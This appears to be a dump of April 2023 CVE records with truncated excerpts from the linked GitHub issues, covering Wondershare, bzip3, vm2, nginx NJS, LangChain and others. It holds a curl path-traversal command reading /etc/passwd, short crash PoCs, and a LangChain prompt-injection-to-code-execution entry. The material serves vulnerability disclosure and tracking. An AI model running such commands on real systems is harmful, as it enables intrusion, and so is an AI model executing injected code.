[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:pdfelement:9.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "CD08948C-F4D4-43F9-BE3A-17226085F935", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/12
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27768 Discoverer:Yuan Lirong **Exploit Title:**Wondershare PDFelement Untrusted Search Path Vulnerability **Date:**2/27/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/pdfelement-pro_setup_full5239.exe **Version:**9.1.1 **Tested on:**Wind...
Wondershare PDFelement Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/12/comments
0
2023-02-28T09:44:15Z
2024-12-15T10:10:43Z
https://github.com/liong007/Wondershare/issues/12
1,602,691,935
12
4,941
CVE-2023-27769
2023-04-04T15:15:09.660
An issue found in Wondershare Technology Co.,Ltd PDF Reader v.1.0.1 allows a remote attacker to execute arbitrary commands via the pdfreader_setup_full13143.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:pdf_reader:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "9CA5F732-5323-487A-AE22-533879A0D63D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/11
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27769 Discoverer:Yuan Lirong **Exploit Title:**Wondershare PDF Reader Untrusted Search Path Vulnerability **Date:**2/27/2023 **Vendor Homepage:**https://www.wondershare.com **Software Link:** https://cc-download.wondershare.cc/inst/pdfreader_setup_full13143.exe **Version:**1.0.1 **Tested on:**Windows...
Wondershare PDF Reader Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/11/comments
0
2023-02-28T09:40:50Z
2024-12-15T10:10:46Z
https://github.com/liong007/Wondershare/issues/11
1,602,685,075
11
4,942
CVE-2023-27770
2023-04-04T15:15:09.710
An issue found in Wondershare Technology Co.,Ltd Edraw-max v.12.0.4 allows a remote attacker to execute arbitrary commands via the edraw-max_setup_full5371.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:edraw-max:12.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "359788D1-D37B-4D52-8497-AF39A0F4FCEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/10
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27770 Discoverer:Yuan Lirong **Exploit Title:**Wondershare Edraw-max Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:**https://www.wondershare.com **Software Link:** https://download.edrawsoft.com/inst/edraw-max_setup_full5371.exe **Version:**12.0.4 **Tested on:**Windows 10
Wondershare Edraw-max Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/10/comments
0
2023-02-28T09:36:42Z
2023-04-13T07:52:01Z
https://github.com/liong007/Wondershare/issues/10
1,602,679,262
10
4,943
CVE-2023-27771
2023-04-04T15:15:09.763
An issue found in Wondershare Technology Co.,Ltd Creative Centerr v.1.0.8 allows a remote attacker to execute arbitrary commands via the wondershareCC_setup_full10819.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/13" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:creative_centerr:1.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "9F0855BB-41BB-4370-89F0-F61BCCF850C9", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/13
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27771 Discoverer:Yuan Lirong **Exploit Title:**Wondershare Creative Center Untrusted Search Path Vulnerability **Date:**3/1/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/wondershareCC_setup_full10819.exe **Version:**1.0.8 **Tested on:**...
Wondershare Creative Center Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/13/comments
0
2023-03-01T02:52:37Z
2023-04-13T07:52:40Z
https://github.com/liong007/Wondershare/issues/13
1,604,137,947
13
4,944
CVE-2023-27089
2023-04-04T18:15:07.000
Cross Site Scripting vulnerability found in Ehuacui BBS allows attackers to cause a denial of service via a crafted payload in the login parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integri...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gitee.com/ehuacui/ehuacui-bbs/issues/I6GDCB" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ehuacui-bbs_project:ehuacui-bbs:-:*:*:*:*:*:*:*", "matchCriteriaId": "692FA4B7-DA8E-4481-A26C-34EFF01BD306", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "79" ]
79
https://github.com/ehuacui/ehuacui-bbs/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ehuacui", "ehuacui-bbs" ]
ehuacui-bbs代码审计 项目介绍 使用 springboot2+beetl+beetsql+elasticsearch 开发的论坛,该项目源于[pybbs](https://gitee.com/link?target=https://github.com/tomoya92/pybbs),使用Spring等框架进行服务端重写,优化了 源工程部分实现逻辑,前台模板和数据库表结构目前大体与[pybbs](https://gitee.com/link?target=https://github.com/tomoya92/pybbs) 保持一致。 开源地址 https://gitee.com/ehuacui/ehuacui-b...
ehuacui-bbs storage XSS
https://api.github.com/repos/ehuacui/ehuacui-bbs/issues/3/comments
0
2023-04-04T08:00:12Z
2023-04-04T08:00:12Z
https://github.com/ehuacui/ehuacui-bbs/issues/3
1,653,386,157
3
4,945
CVE-2023-29374
2023-04-05T02:15:37.340
In LangChain through 0.0.131, the LLMMathChain chain allows prompt injection attacks that can execute arbitrary code via the Python exec method.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/hwchase17/langchain/issues/1026" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/hwchase17/langchain/issues/8...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:langchain:langchain:*:*:*:*:*:*:*:*", "matchCriteriaId": "7C55CEFC-7C13-4D07-A223-1C5E9F7BBF25", "versionEndExcluding": null, "versionEndIncluding": "0.0.131", "versionStartE...
[ "74" ]
74
https://github.com/hwchase17/langchain/issues/1026
[ "Issue Tracking" ]
github.com
[ "hwchase17", "langchain" ]
I have some concerns about the way some of this code is implemented. To name the two I've noticed so far, the llm_math and sql_database chains. It seems these two will blindly execute any code that is fed to it from the llm This is a major security risk, since this opens anyone who uses these up for remote cod...
Security concerns
https://api.github.com/repos/langchain-ai/langchain/issues/1026/comments
31
2023-02-13T21:46:22Z
2023-10-25T16:10:08Z
https://github.com/langchain-ai/langchain/issues/1026
1,583,115,861
1,026
4,947
CVE-2023-29374
2023-04-05T02:15:37.340
In LangChain through 0.0.131, the LLMMathChain chain allows prompt injection attacks that can execute arbitrary code via the Python exec method.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/hwchase17/langchain/issues/1026" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/hwchase17/langchain/issues/8...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:langchain:langchain:*:*:*:*:*:*:*:*", "matchCriteriaId": "7C55CEFC-7C13-4D07-A223-1C5E9F7BBF25", "versionEndExcluding": null, "versionEndIncluding": "0.0.131", "versionStartE...
[ "74" ]
74
https://github.com/hwchase17/langchain/issues/814
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "hwchase17", "langchain" ]
#Overview llm math and PAL both use `exec()` and `eval()` which is dangerous, while PAL is more complex and might have to stay that way, llm-math could be made safer by using numexpr rather than `exec()` I suggest we use something like so: ```python @tool def calculator(expr): """This tool allows you t...
Exploiting llm-math (and likely PAL) and suggesting and alternative
https://api.github.com/repos/langchain-ai/langchain/issues/814/comments
2
2023-01-31T02:37:23Z
2023-05-11T16:06:59Z
https://github.com/langchain-ai/langchain/issues/814
1,563,517,965
814
4,948
CVE-2023-29416
2023-04-06T05:15:07.460
An issue was discovered in libbzip3.a in bzip3 before 1.3.0. A bz3_decode_block out-of-bounds write can occur with a crafted archive because bzip3 does not follow the required procedure for interacting with libsais.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/kspalaiologos/bzip3/commit/bfa5bf82b53715dfedf048e5859a46cf248668ff" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/kspalaiologos/bzip3/compare/1.2.3....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bzip3_project:bzip3:*:*:*:*:*:*:*:*", "matchCriteriaId": "EB15180E-FDF7-4F85-997B-9A0838917ADE", "versionEndExcluding": "1.3.0", "versionEndIncluding": null, "versionStartExc...
[ "787" ]
787
https://github.com/kspalaiologos/bzip3/issues/92
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "kspalaiologos", "bzip3" ]
Hello, Here are my findings about v1.2.2. You can reproduce via `bzip3 -Bcd $FILE` I didn't make further analisys, so I don't know if there are issues, with the same root cause. Please specify that so we will make as little confusion as possible in the CVE request. 1) Full log: 11.crashes.bz3.log.txt Te...
multiple crashes from fuzzing
https://api.github.com/repos/kspalaiologos/bzip3/issues/92/comments
15
2023-03-22T10:48:25Z
2023-04-07T07:40:40Z
https://github.com/kspalaiologos/bzip3/issues/92
1,635,514,192
92
4,949
CVE-2023-29417
2023-04-06T05:15:07.500
An issue was discovered in libbzip3.a in bzip3 1.2.2. There is a bz3_decompress out-of-bounds read in certain situations where buffers passed to bzip3 do not contain enough space to be filled with decompressed data. NOTE: the vendor's perspective is that the observed behavior can only occur for a contract violation, an...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/kspalaiologos/bzip3/issues/97" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bzip3_project:bzip3:1.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "DEC31610-0B46-4521-8F29-2A29C4C1B808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "125" ]
125
https://github.com/kspalaiologos/bzip3/issues/97
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "kspalaiologos", "bzip3" ]
On v1.2.3, reproducibile via `examples/decompress-file.c` ``` ==9769==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fefd53fed58 at pc 0x0000004a22f7 bp 0x7ffe364dd760 sp 0x7ffe364dcf30 READ of size 16580610 at 0x7fefd53fed58 thread T0 #0 0x4a22f6 in __asan_memcpy /var/tmp/portage/sys-libs/compil...
heap-buffer-overflow in bz3_decompress()
https://api.github.com/repos/kspalaiologos/bzip3/issues/97/comments
9
2023-03-27T07:13:16Z
2023-03-27T14:21:28Z
https://github.com/kspalaiologos/bzip3/issues/97
1,641,526,663
97
4,950
CVE-2023-29421
2023-04-06T05:15:07.653
An issue was discovered in libbzip3.a in bzip3 before 1.2.3. There is an out-of-bounds write in bz3_decode_block.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/kspalaiologos/bzip3/compare/1.2.2...1.2.3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/kspalaiologos/bzip3...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bzip3_project:bzip3:*:*:*:*:*:*:*:*", "matchCriteriaId": "6FD980D9-5ECE-4C1A-B631-DBDB8E983FF9", "versionEndExcluding": "1.2.3", "versionEndIncluding": null, "versionStartExc...
[ "787" ]
787
https://github.com/kspalaiologos/bzip3/issues/94
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "kspalaiologos", "bzip3" ]
By using the code from [decompress-file](https://github.com/kspalaiologos/bzip3/blob/8d433c4bdde8890fc41c16be1544e1b74e2e7d4c/examples/decompress-file.c) With: ``` ./decompress_file $FILE ``` I get: ``` ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f6d6ec6c800 at pc 0x0000004a23aa bp 0x7ffe6a...
heap-based buffer overflow WRITE in bz3_decode_block()
https://api.github.com/repos/kspalaiologos/bzip3/issues/94/comments
2
2023-03-22T13:31:21Z
2023-04-07T07:27:09Z
https://github.com/kspalaiologos/bzip3/issues/94
1,635,771,992
94
4,951
CVE-2023-1802
2023-04-06T09:15:07.030
In Docker Desktop 4.17.x the Artifactory Integration falls back to sending registry credentials over plain HTTP if the HTTPS health check has failed. A targeted network sniffing attack can lead to a disclosure of sensitive information. Only users who have Access Experimental Features enabled and have logged in to a pri...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "int...
[ { "source": "security@docker.com", "tags": [ "Release Notes" ], "url": "https://docs.docker.com/desktop/release-notes/#4180" }, { "source": "security@docker.com", "tags": [ "Exploit" ], "url": "https://github.com/docker/for-win/issues/13344" }, { "source": "af...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:docker:desktop:4.17.0:*:*:*:*:windows:*:*", "matchCriteriaId": "D7217294-76FA-466D-A46E-85076F041746", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "319" ]
319
https://github.com/docker/for-win/issues/13344
[ "Exploit" ]
github.com
[ "docker", "for-win" ]
<!-- Click these checkboxes after submitting, or place an "x" in them. --> - [x] I have tried with the latest version of Docker Desktop - [x] I have tried disabling enabled experimental features - [ ] I have uploaded Diagnostics - Diagnostics ID: ### Actual behavior When `Access experimental features` o...
Artifactory integration is leaking CR credentials!
https://api.github.com/repos/docker/for-win/issues/13344/comments
2
2023-03-28T18:54:04Z
2024-04-16T13:31:31Z
https://github.com/docker/for-win/issues/13344
1,644,500,016
13,344
4,952
CVE-2023-29017
2023-04-06T20:15:08.723
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on th...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "int...
[ { "source": "security-advisories@github.com", "tags": [ "Exploit" ], "url": "https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/patriksimek/vm2/commit/d5...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "ADA32E89-C69C-4459-9515-D3F7B53EFCAE", "versionEndExcluding": "3.9.15", "versionEndIncluding": null, "versionStart...
[ "913" ]
913
https://github.com/patriksimek/vm2/issues/515
[ "Exploit", "Issue Tracking" ]
github.com
[ "patriksimek", "vm2" ]
Hello team, I am Seongil Wi from KAIST in South Korea. Our research team in KAIST [WSP Lab](https://wsp-lab.github.io/) found a sandbox escape bug in vm2@3.9.14. Since this is a confidential issue, we have sent an e-mail with PoC to the administrators below, so please check it. - @XmiliaH [XmiliaH](https://gith...
[VM2 Sandbox Escape] Vulnerability in vm2@3.9.14
https://api.github.com/repos/patriksimek/vm2/issues/515/comments
13
2023-04-06T15:48:40Z
2023-05-10T17:06:06Z
https://github.com/patriksimek/vm2/issues/515
1,657,669,012
515
4,953
CVE-2023-26817
2023-04-07T03:15:06.953
codefever before 2023.2.7-commit-b1c2e7f was discovered to contain a remote code execution (RCE) vulnerability via the component /controllers/api/user.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PGYER/codefever/issues/140" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pgyer:codefever:*:*:*:*:*:*:*:*", "matchCriteriaId": "D693BAD0-F600-414B-B57D-6C5C26996B9E", "versionEndExcluding": "2023-02-07", "versionEndIncluding": null, "versionStartEx...
[ "94" ]
94
https://github.com/PGYER/codefever/issues/140
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PGYER", "codefever" ]
## List of Vulnerable path Vulnerable path /application/controllers/api/user.php Vulnerable path /application/libraries/service/Network/Request.php ## The process of code audit The $email is from Request::parse(). ![controller0.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1676010771460-26677827-14ba-4d35-...
The Codefeve before 2023.2.7-b1c2e7f has a Remote Command Execute Vulnerability
https://api.github.com/repos/PGYER/codefever/issues/140/comments
1
2023-02-10T09:24:17Z
2023-02-14T01:34:49Z
https://github.com/PGYER/codefever/issues/140
1,579,328,294
140
4,954
CVE-2023-26820
2023-04-07T03:15:06.993
siteproxy v1.0 was discovered to contain a path traversal vulnerability via the component index.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netptop/siteproxy/issues/67" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:siteproxy_project:siteproxy:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B89D7AB9-2277-4D84-A549-0E10761E39F4", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "22" ]
22
https://github.com/netptop/siteproxy/issues/67
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "netptop", "siteproxy" ]
There is no path traversal chek in [index.js](https://github.com/netptop/siteproxy/blob/2551e273761fd377bb5f7f00299e9a089399be57/index.js#L31) when sending local files, so it's possible to read any file by path traversal. poc: `curl --path-as-is http://siteproxy.your.domain.name/../../../etc/passwd` ![image.png](...
path traversal vulnerability
https://api.github.com/repos/netptop/siteproxy/issues/67/comments
2
2023-02-10T12:04:57Z
2024-02-20T23:54:46Z
https://github.com/netptop/siteproxy/issues/67
1,579,575,247
67
4,955
CVE-2023-27727
2023-04-09T20:15:56.650
Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_function_frame at src/njs_function.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/nginx/njs/issues/617" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/nginx/njs/issu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*", "matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nu...
[ "125" ]
125
https://github.com/nginx/njs/issues/617
[ "Exploit", "Issue Tracking" ]
github.com
[ "nginx", "njs" ]
Environment ``` commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976 version: 0.7.10 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Poc ```js const v1 = EvalError(EvalError); Object.defineProperty(v1, "message", { configurable: true, set: EvalError }); delete v1.message; Eval...
SEGV src/njs_function.h:155:9 in njs_function_frame
https://api.github.com/repos/nginx/njs/issues/617/comments
0
2023-02-21T02:44:30Z
2023-02-28T06:16:14Z
https://github.com/nginx/njs/issues/617
1,592,691,159
617
4,956
CVE-2023-27728
2023-04-09T20:15:56.703
Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_dump_is_recursive at src/njs_vmcode.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/nginx/njs/issues/618" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "htt...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*", "matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nu...
[ "125" ]
125
https://github.com/nginx/njs/issues/618
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "nginx", "njs" ]
Environment ``` commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976 version: 0.7.10 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Poc ```js Object.defineProperty([], 'a', { configurable: true, enumerable: true, get: Object}); ``` Asan ``` ==31165==ERROR: AddressSanitizer: ...
SEGV src/njs_json.c in njs_dump_is_recursive
https://api.github.com/repos/nginx/njs/issues/618/comments
0
2023-02-21T02:46:42Z
2023-02-28T06:16:14Z
https://github.com/nginx/njs/issues/618
1,592,692,581
618
4,957
CVE-2023-27729
2023-04-09T20:15:56.740
Nginx NJS v0.7.10 was discovered to contain an illegal memcpy via the function njs_vmcode_return at src/njs_vmcode.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/nginx/njs/issues/619" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/nginx/njs/issues/6...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*", "matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nu...
[ "119" ]
119
https://github.com/nginx/njs/issues/619
[ "Issue Tracking", "Patch" ]
github.com
[ "nginx", "njs" ]
This is new one, different from another Poc will be upload later Asan ``` ==20795==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fd4936f313f bp 0x7ffd1d582440 sp 0x7ffd1d581bf8 T0) ==20795==The signal is caused by a WRITE memory access. ==20795==Hint: address points to the zero page. ...
illegal memcpy during njs_vmcode_return in src/njs_vmcode.c
https://api.github.com/repos/nginx/njs/issues/619/comments
0
2023-02-24T08:36:06Z
2023-03-04T01:12:48Z
https://github.com/nginx/njs/issues/619
1,598,176,339
619
4,958
CVE-2023-27730
2023-04-09T20:15:56.780
Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_lvlhsh_find at src/njs_lvlhsh.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/nginx/njs/issues/615" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "htt...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*", "matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nu...
[ "125" ]
125
https://github.com/nginx/njs/issues/615
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "nginx", "njs" ]
Environment ``` commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976 version: 0.7.10 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Poc ```js const v1 = URIError(); v1.name = URIError(); URIError && v1; ``` Asan ``` ==21471==ERROR: AddressSanitizer: SEGV on unknown address...
SEGV src/njs_lvlhsh.c:176:16 in njs_lvlhsh_find
https://api.github.com/repos/nginx/njs/issues/615/comments
0
2023-02-21T02:38:22Z
2023-02-28T06:16:13Z
https://github.com/nginx/njs/issues/615
1,592,687,556
615
4,959
CVE-2023-26919
2023-04-10T16:15:07.200
delight-nashorn-sandbox 0.2.4 and 0.2.5 is vulnerable to sandbox escape. When allowExitFunctions is set to false, the loadWithNewGlobal function can be used to invoke the exit and quit methods to exit the Java process.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integri...
